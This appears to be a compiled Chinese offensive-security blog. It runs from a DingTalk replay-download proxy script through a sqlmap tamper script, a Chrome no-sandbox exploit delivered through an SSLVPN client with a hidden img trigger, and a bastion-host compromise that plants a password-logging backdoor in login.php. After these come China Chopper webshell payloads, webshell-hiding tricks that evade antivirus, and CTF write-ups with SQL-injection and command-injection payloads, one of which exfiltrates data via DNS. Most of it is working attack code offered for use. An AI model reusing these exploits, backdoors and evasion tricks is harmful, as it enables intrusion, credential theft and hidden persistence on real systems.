钉钉回放管理员默认设置不能下载，于是写了个小脚本用于视频下载。

python 库

1

beautifulsoup4、mitmproxy、python-ffmpeg

mitmproxy 安装https证书，钉钉设置本地代理，启动脚本，依次点击需要下载的视频就好了。

1

mitmweb -s main.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

from mitmproxy import ctx
from bs4 import BeautifulSoup
from threading import Thread
import ffmpeg
import re

data = {}

def downloadvideo(url, keyname):
    filename = data.get(keyname)
    stream = ffmpeg.input(url)
    stream = ffmpeg.output(stream, filename + '.mp4')
    ffmpeg.run(stream)


def request(flow):
    global key_tmp
    global video
    request = flow.request
    info = ctx.log.info
    url = request.url
    path = request.path
    info(request.host)
    if request.host == "h5.dingtalk.com":
        pattern = re.compile("liveUuid=(.*)&")
        re_liveUuid = pattern.findall(path)
        re_liveUuid = "".join(re_liveUuid)
        key_tmp = re_liveUuid
        info(re_liveUuid)
    if key_tmp:
        re_live_hp = re.search("live_hp/" + key_tmp + "_merge.m3u8", path)
        if re_live_hp:
            video = url
            # downloadvideo(videourl, key_tmp)
            t1 = Thread(target=downloadvideo, args=(video, key_tmp))
            t1.start()


def response(flow):
    global data
    info = ctx.log.info
    response = flow.response
    soup = BeautifulSoup(response.text, 'html.parser')
    # 获取需要下载的视频名称
    pattern = re.compile("<meta content=\"(.*)\" property=\"og:title\"")
    meta = soup.find_all(attrs={"property": "og:title"})
    title = pattern.findall(str(meta))
    if title:
        title = "".join(title)
        tmp = {key_tmp: title}
        data.update(tmp)
        info(data)

想要对其进行注入测试的话需要对其算法进行逆向解密，然后再进行注入。

使用phantomjs+jsEncrypter项目中phantomjs_server.js 起个数据加密接口对需要的字符串进行加密。节省大量时间不需要对算法使用python进行重新编写。

JavaScript加密算法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

function encode16(str){
    str=str.toLowerCase();
    if (str.match(/^[-+]?\d*$/) == null){//非整数字符，对每一个字符都转换成16进制，然后拼接
        var s=str.split("");
        var temp="";
        for(var i=0;i<s.length;i++){
            s[i]=s[i].charCodeAt();//先转换成Unicode编码
            s[i]=s[i].toString(16);
            temp=temp+s[i];
        }
        return temp+"{"+1;//1代表字符
    }else{//数字直接转换成16进制
        str=parseInt(str).toString(16);
    }
    return str+"{"+0;//0代表纯数字
}
 
 
function produceRandom(n){
    var num=""; 
    for(var i=0;i<n;i++) 
    { 
        num+=Math.floor(Math.random()*10);
    } 
    return num;
}
 
//主加密函数
function encrypt(str){
    var encryptStr="";//最终返回的加密后的字符串
    encryptStr+=produceRandom(3);//产生3位随机数
     
    var temp=encode16(str).split("{");//对要加密的字符转换成16进制
    var numLength=temp[0].length;//转换后的字符长度
    numLength=numLength.toString(16);//字符长度换算成16进制
    if(numLength.length==1){//如果是1，补一个0
        numLength="0"+numLength;
    }else if(numLength.length>2){//转换后的16进制字符长度如果大于2位数，则返回，不支持
        return "";
    }
    encryptStr+=numLength;
     
    if(temp[1]=="0"){
        encryptStr+=0;
    }else if(temp[1]=="1"){
        encryptStr+=1;
    }
     
    encryptStr+=temp[0];
     
    if(encryptStr.length<20){//如果小于20位，补上随机数
        var ran=produceRandom(20-encryptStr.length);
        encryptStr+=ran;
    }
    return encryptStr;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

/**
 * author: c0ny1
 * date: 2017-12-16
 * last update: 2019-5-30 11:16
 */
var fs = require('fs');
var logfile = 'jsEncrypter.log';
var webserver = require('webserver');
server = webserver.create();

var host = '127.0.0.1';
var port = '1664';

// 加载实现加密算法的js脚本
var wasSuccessful = phantom.injectJs('encrypt.js');/*引入实现加密的js文件*/

// 处理函数
function js_encrypt(payload){
//var newpayload;
/**********在这里编写调用加密函数进行加密的代码************/
 var newpayload = encrypt(payload);
/**********************************************************/
return newpayload;
}

if(wasSuccessful){
console.log("[*] load js successful");
console.log("[!] ^_^");
console.log("[*] jsEncrypterJS start!");
console.log("[+] address: http://"+host+":"+port);
}else{
console.log('[*] load js fail!');
}

var service = server.listen(host+':'+port,function(request, response){
 try{
if(request.method == 'POST'){
var payload = request.post['payload'];
var encrypt_payload = js_encrypt(payload); 
var log = payload + ':::' + encrypt_payload;
console.log('[+] ' + log);
            fs.write(logfile,log + '\n', 'w+');
response.statusCode = 200;
response.write(encrypt_payload.toString());
response.close();
}else{
  response.statusCode = 200;
  response.write("^_^\n\rhello jsEncrypter!");
  response.close();
}
}catch(e){
//console.log('[Error]'+e.message+' happen '+e.line+'line');
console.log('\n-----------------Error Info--------------------')
var fullMessage = "Message: "+e.toString() + ':'+ e.line;
for (var p in e) {
fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
} 
console.log(fullMessage);
console.log('---------------------------------------------')
console.log('[*] phantomJS exit!')
phantom.exit();
    }
});

启动tools

phantomjs.exe phantomjs_server.js

编写Sqlmap tamper脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
import requests

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def enpayload(payload):
    burp0_url = "http://127.0.0.1:1664/"
    burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"payload": payload}
    res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,timeout=5)
    return res.text


def tamper(payload, **kwargs):
    """
    调用phantomjs的web服务对payload进行加密发送

    >>> tamper("1' AND SLEEP(5)#")
    '8850207b695707800110'
    """

    return enpayload("2021"+payload) if payload else payload

Sqlmap调用脚本进行注入

求Red Team大佬放过，hvv马上也快停止了。

前言

如果要在实战中该漏洞需要chrome游览器关闭沙箱漏洞才能利用成功。受害者如果已经打开游览器了无论受害者怎么点击快捷方式都不会以关闭沙箱方式打开，这里可以说是chrome的一个特性吧。chrome每次创建一个网页都会启动一个子进程。

这里需要考虑一种利用方式就是如果让chrome启动的时候创建一个和原游览器完全无关的一个游览器。
通过阅读Chrome启动参数文档发现 --user-data-dir= 能在启动的时候创建一个与原浏览器完全隔离的环境。

存放数据文件指定到 C:/Windows/Temp/

1

--user-data-dir=C:/Windows/Temp/

使用无痕默认减少暴露痕迹

1

-incognito

对新创建的窗口进行隐藏

1

--headless

利用方式一：快捷方式

1

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -incognito --headless --user-data-dir=C:/Windows/Temp/ --no-sandbox http://xx.xx.xx.xx/index.html

利用方式二：某SSLVPN X Chrome

hvv前期准备工作的时候想着部署各种反制蜜罐反控攻击者机器，在VICP平台看了公司研究院大佬Avscx的mac版客户端RCE的分析研究文章,未对url参数的值进行过滤导致的漏洞触发,主要是针对于mac端的一个利用。

hvv期间刚好Chrome 0day就爆了出来。于是就想到了Windows下可以通过传入启动参数的方式来进行利用。

利用条件

某SSLVPN

Google Chrome <= 90.0.4430.72 和 Microsoft Edge 没测试

EXP 编码前

1

https://127.0.0.1:54530/ECAgent/?op=OpenBrowser&arg={"url":" --no-sandbox -incognito --headless --user-data-dir=C:/Windows/Temp/ https://X.X.X.X/exp.html","type":"chrome","withShortcut":0}

EXP 编码后

1

https://127.0.0.1:54530/ECAgent/?op=OpenBrowser&arg=%7B%22url%22%3A%22 --no-sandbox -incognito --headless --user-data-dir%3DC%3A%2FWindows%2FTemp%2F https%3A%2F%2FX.X.X.X%2Fexp.html%22%2C%22type%22%3A%22chrome%22%2C%22withShortcut%22%3A0%7D

插入html中

1

<img hidden src="http://3t7.net/binfe">

可以在真正利用的时候对url做各种短链接，跳转好几次让受害者无法找真正的利用。

插入任意网页，使用任意的游览器和任意能发起url请求的软件都能触发。

演示

反制

可以利用这漏洞组合拳起来反制攻击队，攻击队也可以用来攻击。

漏洞修复

升级Google Chrome 和 Microsoft Edge 浏览器的最新版。
(攻击者也可以调用Edge来触发执行)

安装SSLVPN客户端最新版。
暂时不用建议删除

直接利用CNVD-2019-20835对目标进行getshell。

查看版本 2.6.32 可以直接用脏牛漏洞进行提权，使用的数据库是postgres，直接导出吧。

通过查询导出后的hash和阅读代码发现数据库存储密码使用了sha1(password+Salt)的方式进行存储，加上堡垒机的密码设置规则一般不少于8位数的数字+字母+特殊字符 用这种方式获取能登录的账户密码基本无解。

代码使用的是PM9SCREW加密过的，解密脚本

https://github.com/firebroo/screw_decode

解密PM9SCREW要满足2个条件，一个就是获得PM9SCREW所使用的编码可以从加密的php文件开头获取到，还有一个就是所使用的pm9screw_mycryptkey 这个需要对php_screw.so进行逆向获取。

转换为10进制就是45456, 52453, XXXXXXXXXXXXXXXXXXXX，不知道是不是每个厂商是特定的一串key 还是打一下码害怕找上门。

用github上下载下来的代码替换一下key，重新编译一下就好了

1
2
3

./decode shterm/
find . -name "*.php" | xargs rm -rf
find . -name '*.php.decode' | awk -F "." '{print $2}' | xargs -i -t mv ./{}.php.decode ./{}.php

依次执行一下 就能获得解密后的代码了。

接下来的思路就是怎么获取明文密码了，我的思路就是在login.php插入记录用户名和账号密码的流量记录脚本。

修改一下以前打CTF时用过的脚本

在login.php文件里包含一下这个文件.

还要对login.php文件进行加密, https://github.com/Luavis/php-screw

直接替换一下my_screw.h 里面的key到tools目录下直接编译就好了。

直接到服务器替换login.php就OK了

几天后………

抓到的POST数据包，password字段也是经过加密的

看一下login.php发现是用了rc4加密 直接用里面的代码进行解密就得到明文了

经过大佬的提醒，刚刚看了一下密码是直接存储在session文件里面的，这样的话就不用搞那么多花样了直接看session文件

读代码一定要先读完再去考虑怎么做…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$D = dirname(__FILE__);
$R = "{$D}\t";
if (substr($D, 0, 1) != "/") {
    foreach(range("A", "Z") as $L) if (is_dir("{$L}:")) $R. = "{$L}:";
}
$R. = "\t";
$u = (function_exists('posix_getegid')) ? @posix_getpwuid(@posix_geteuid()) : '';
$usr = ($u) ? $u['name'] : @get_current_user();
$R. = php_uname();
$R. = "({$usr})";
print $R;;
echo("X@Y");
die();

@ ini_set(“display_errors”, “0”)关闭PHP的错误显示
@set_time_limit(0) 设置程序的执行时间，应该是为了放在上传文件，执行命令回显超时等问题。
if (PHP_VERSION < ‘5.3.0’) {@set_magic_quotes_runtime(0);};版本大于5.3.0就关闭，当传输的POST或者get数据存在反斜杆（\）、单引号（’）、双引号（”）等特殊字符是就自动加上(斜杠)。
echo(“X@Y”);用于反caidao返回数据的中定位用的，如X@Y12345X@Y,那么caidao就读出内容为12345,
if (substr($D, 0, 1) != “/“) {
foreach(range(“A”, “Z”) as $L) if (is_dir(“{$L}:”)) $R. = “{$L}:”;
}
获取网站的绝对路径以及存在多少个盘.
$u = (function_exists(‘posix_getegid’)) ? @posix_getpwuid(@posix_geteuid())
获取当前进程的用户名，这个好像posix_geteuid()好像只有在linux下才有效
$usr = ($u) ? $u[‘name’] : @get_current_user();
获取执行脚本权限的用户名，比如www，system。
php_uname();返回了运行 PHP 的操作系统的描述

##请求包二

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$D = 'D:\\www\\security\\';
$F = @opendir($D);
if ($F == NULL) {
    echo("ERROR:// Path Not Found Or No Permission!");
} else {
    $M = NULL;
    $L = NULL;
    while ($N = @readdir($F)) {
        $P = $D.'/'.$N;
        $T = @date("Y-m-d H:i:s", @filemtime($P));@$E = substr(base_convert(@fileperms($P), 10, 8), -4);
        $R = "\t".$T."\t".@filesize($P)."\t".$E."\n";
        if (@is_dir($P)) $M. = $N."/".$R;
        else $L. = $N.$R;
    }
    echo $M.$L;@closedir($F);
};
echo("X@Y");
die();

@date(“Y-m-d H:i:s”, @filemtime($P));
获取“D:\www\security\”下的文件时间
@$E = substr(base_convert(@fileperms($P), 10, 8), -4)
文件权限以八进制的形式进行返回 如0777，0666

读取文件

1
2
3
4
5
6
7
8
9

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$F = 'D:\\www\\security\\2008.php';
$P = @fopen($F, 'r');
echo(@fread($P, filesize($F)));@fclose($P);;
echo("X@Y");
die();

$P = @fopen($F, ‘r’);
echo(@fread($P, filesize($F)));@fclose($P);;
打开需要读取的文件，获取文件大小然后进行读取，读取完成后关闭打开的文件

文件下载

1
2
3
4
5
6
7
8
9
10
11
12

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$F = "D:\\www\\security\\2008.php";
$fp = @fopen($F, 'r');
if (@fgetc($fp)) {@fclose($fp);@readfile($F);
} else {
    echo('ERROR:// Can Not Read');
};
echo("X@Y");
die();

使用fgetc（）函数判断文件是不是空的，是空的话跳过，不是空则用@readfile()进行读取并且下载

文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$f = 'D:\\www\\security\\php.php';
$c = $_POST["z1"];
$c = str_replace("\r", "", $c);
$c = str_replace("\n", "", $c);
$buf = "";
for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode('%'.substr($c, $i, 2));
echo(@fwrite(fopen($f, 'w'), $buf) ? '1': '0');;
echo("X@Y");
die();
&z1=6161

for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode(‘%’.substr($c, $i, 2));
echo(@fwrite(fopen($f, ‘w’), $buf) ? ‘1’: ‘0’);
&z1=6161的值为16进制编码，把文件上次内容进行16进制编码然后使用urldecode进行16进制的解码，然后写入文件.

虚拟终端

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

@ini_set("display_errors", "0");@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {@set_magic_quotes_runtime(0);
};
echo("X@Y");
$m = get_magic_quotes_gpc();
$p = 'cmd';
$s = 'cd /d D:\\www\\security\\&whoami&echo [S]&cd&echo [E]';
$d = dirname($_SERVER["SCRIPT_FILENAME"]);
$c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"": "/c \"{$s}\"";
$r = "{$p} {$c}";
$array = array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w"));
$fp = proc_open($r." 2>&1", $array, $pipes);
$ret = stream_get_contents($pipes[1]);
proc_close($fp);
print $ret;;
echo("X@Y");
die();

dirname($_SERVER[“SCRIPT_FILENAME”]获取当前可执行脚本的路径部分，如echo dirname(“C:/testweb/home.php”); 返回C:/testweb/
$c = substr($d, 0, 1) == “/“ ? “-c "{$s}"“: “/c "{$s}"“;判断获取到的路径是不是/开头的如果是则执行 /bin/sh -c “whoami”如果不是则会执行cmd /c “whoami”
/bin/sh 一般为/bin/
/bin/sh 相当于 /bin/bash –posix
/bin/sh -c “参数”如何不加-c参数，则shell会进入一个交互式的shell
Cmd /c “参数”执行完指定命令后然后终止

docker pull redis

Docker run -d redis

Docker run -it redis /bin/bash

docker inspect 9f5946f764b9 | grep IPAddress

https://github.com/jas502n/Redis-RCE

漏洞原理

文章https://paper.seebug.org/975/

看这张图就懂了

漏洞参考

https://paper.seebug.org/975/

漏洞EXP

https://github.com/LoRexxar/redis-rogue-server
https://github.com/jas502n/Redis-RCE
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/RicterZ/RedisModules-ExecuteCommand

子域名收集

使用Sublist3r进行枚举枚举子域名

python sublist3r.py -d dingtalk.com -b -t 50 -o dingtalk.com.txt

Ip段资产收集

使用BASH脚本把域名解析成IP，并且去重加C段识别

for i in `cat dingtalk.com.txt`;do host $i|grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}";done >ips.txt

cat ips.txt |sort|uniq|grep -E -o "([0-9]{1,3}[\.]){3}"|uniq -c|awk '{if($1>=2)print $2"0/24"}' > ip.txt

对于大公司的IP段的信息收集可以使用https://bgp.he.net

利用前面获取到的IP段，可以用nmap，masscan进行端口扫描，这里用到了一个nmap的的模板nmap-bootstrap.xsl，这个模板需要自行下载：https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl

nmap -iL ip.txt -sS -T4 -A -sC -oA scanme xsltproc -o scanme.html nmap-bootstrap.xsl scanme.xml
（扫描完打开scanme.html文件可能会是xml格式的，使用xsltproc -o scanme.html nmap-bootstrap.xsl scanme.xml进行转换）

WEB资产识别

WEB资产识别，使用EyeWitness https://github.com/FortyNorthSecurity/EyeWitness

python EyeWitness.py -f 目标.txt –web –active-scan –add-http-ports 80,81,88,443,888,2082,2083,3122,4848,6588,7000,7001,7002,7003,8000,8080,8081,8089,8090,8443,8500,8888,9000,9001,9200,9043,9080,10000,10051,50000 –addhttps-ports 443,8443,9043nmap -T4 -iL 目标.txt -oX scan.xml -p 80,81,88,443,888,2082,2083,3122,4848,6588,7000,7001,7002,7003,8000,8080,8081,8089,8090,8443,8500,8888,9000,9001,9200,9043,9080,10000,10051,50000 -Pn --open -npython EyeWitness.py -x scan.xml --web --no-dns --active-scan

分享几个用来隐藏WEBSHELL的小技巧。
把一句话木马压缩成a.zip文件

使用D盾扫一下

重新对a.zip再进行压缩，压缩成11.zip

这下就识别不了。D盾只对第一层压缩包进行扫描，并不会对压缩包里的压缩包进行扫描,通过这个小技巧我们可以用来隐藏后门。
而已D盾还不会对PHP压缩包类进行报毒等操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php 
if(isset($_GET['zip'])){
if(isset($_GET['f'])){
$zipname=$_GET['zip'];
$f=$_GET['f'];
$zip = new ZipArchive; 
$res = $zip->open("$zipname"); 
if ($res === TRUE) { 
$zip->extractTo("$f");
echo '解压成功';
} else { 
echo 'failed, code:' . $res; 
 } 
 $zip->close(); 
}
}
?>

只需解压两次即可把shell解压出来。

利用缓存目录来隐藏shell

文件上传到缓存目录，在把文件移动到web目录前，利用文件包含来执行代码。

1
2
3
4
5
6

<?php
@$file = $_FILES['file']['tmp_name'];
if($file != NULL)
@include($file);
echo ("<form method='post' enctype='multipart/form-data'><input name='file' type='file'/><input type='submit' value='上传' /></form>");
?>

从题目名称可以看出这个是git信息泄露的题目。

1

https://github.com/BugScanTeam/GitHack

利用git源码恢复工具进行恢复。

使用git log命令查看版本信息，然后使用git checkout恢复到上一个版本。

speed

第二题是一道条件竞争漏洞的题目，注册后进入后台只有一个文件上传点，上传正常图片可以上传成功，但是上传.php文件会提示上传文件后缀非法,已删除所以我们要抢在文件被删除前访问才能获得flag。

calculate

https://xz.aliyun.com/t/2456
修改下源码即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

import requests, re

def calc(v1, v2, op, s):
    u = "http://54.223.83.192:8888/cgi-bin/calculate.py?"
    payload = dict(value1=v1, value2=v2, op=op, source=s, t=t)
    # print payload
    r = requests.get(u, params=payload)
    # print r.url
    res = re.findall("<pre>\n>>>>([\s\S]*)\n>>> <\/pre>",
                     r.content)[0].split('\n')[1]
    assert (res != 'Invalid')
    return res == 'True'
    # print r.content


def check(mid):
    s = flag + chr(mid)
    return calc(v1, v2, op, s)


def bin_search(seq=xrange(0x20, 0x80), lo=0, hi=None):
    assert (lo >= 0)
    if hi == None: hi = len(seq)
    while lo < hi:
        mid = (lo + hi) // 2
        # print lo, mid, hi, "\t",
        if check(seq[mid]): hi = mid
        else: lo = mid + 1
    return seq[lo]


flag = ''
v1, v2, op, s , t = 'x',"+FLAG<value1+source#", "+'", '',"1a69aa60224a7095ececda5c7c6834fc"

while (1):
    flag += chr(bin_search() - 1)
    print flag

babyshop

随便购买点商品，然后在卖出的时候修改商品数量让它溢出。

Bake cookies

这题从名字可以看出是有关于COOKIE的,从标题看到JWT,JSON Web Token

进去界面猜测账号密码，使用guest/guest登录成功了…弱口令,进去后抓包看COOKIE。

明显是JSON Web Token,访问https://jwt.io去解密

修改为
{
“name”: “admin”,
“admin”: “true”
}
后果COOKIE后提交发现报错信息貌似返回了密钥

填写上密钥重新生成下提交

一开始拿到链接尝试用and 1=1 来检测注入点，发现有过滤。

尝试利用注释+大小写来进行绕过注入拦截。

1
2
3
4
5
6
7
8
9
10

检测字段
/**/Union/**/Select/**/1,2,3,4,5#
获取数据库敏感信息，当前数据库为news
/**/Union/**/Select/**/1,database(),user(),version(),5#
获取到一张tb_flag表。
/**/Union/**/Select/**/1,(selEct/**/table_name/**/fRoM/**/infOrmation_schema.tables/**/whEre/**/TABLE_SCHEMA/**/=/**/‘news’/**/limit/**/1,1),3,4,5#
获取到tb_flag表只有一个字段
/**/Union/**/Select/**/1,(selEct/**/table_name/**/fRoM/**/infOrmation_schema.tables/**/whEre/**/TABLE_SCHEMA/**/=/**/‘news’/**/limit/**/1,1),3,4,5#
获取到flag为flag{1396265adbb760c86475304b98e3f61c}
/**/Union/**/Select/**/1,(selecT/**/*/**/frOm/**/tb_flag/**/limit 0,1),3,4,5#

你会ping吗？

访问Robots.txt 发现index.txt

1

<?php include("where_is_flag.php");echo "ping";$ip =(string)$_GET['ping'];$ip =str_replace(">","0.0",$ip);system("ping  ".$ip);

解题方式一

1

http://192.168.5.66/?ping=`cp where_is_flag.php 520.txt`

解题方式二

1

http://192.168.5.66/?ping=`cat where_is_flag.php|sed 's/\s/qqq/g'`.****.ceye.io

upload

正常上传一张图片。提示请上传gif图片，猜测这里是检测上传文件头，直接打开一个.php文件在文件开头添加上

1

GIF89a

就能获取flag

babysql2

右键查看源码发现source.php

1
2
3
4
5
6
7
8
9
10

$id = $_GET['id']?waf($_GET['id']):1;

function waf($var){
if(stristr($_SERVER[‘HTTP_USER_AGENT’],‘sqlmap’)){         
    echo "<center>hacker<center>";
    die();
}
$var = preg_replace(‘/([^a-z]+)(union|from)/i’, ‘&#160;$2’, $var);   
return $var;
}

1
2
3
4
5
6
7
8

获取数据库名称
\Nunion select 1,group_concat(schema_name),\Nfrom information_schema.schemata--+
获取表
\Nunion select 1,group_concat(table_name),\Nfrom information_schema.tables where TABLE_SCHEMA=database()--+
获取字段名称
\Nunion select 1,group_concat(column_name),\Nfrom information_schema.columns  WHERE table_name='flag'--+
获取flag
\Nunion select 1,group_concat(flag),\Nfrom flag--+

dbappweb-webscan

1
2

index.php?act=news&id=-1 union select 1,group_concat(column_name),user() from information_schema.columns  WHERE table_name='ctf'--+
index.php?act=news&id=-1 union select 1,title,content from ctf limit 1,1--+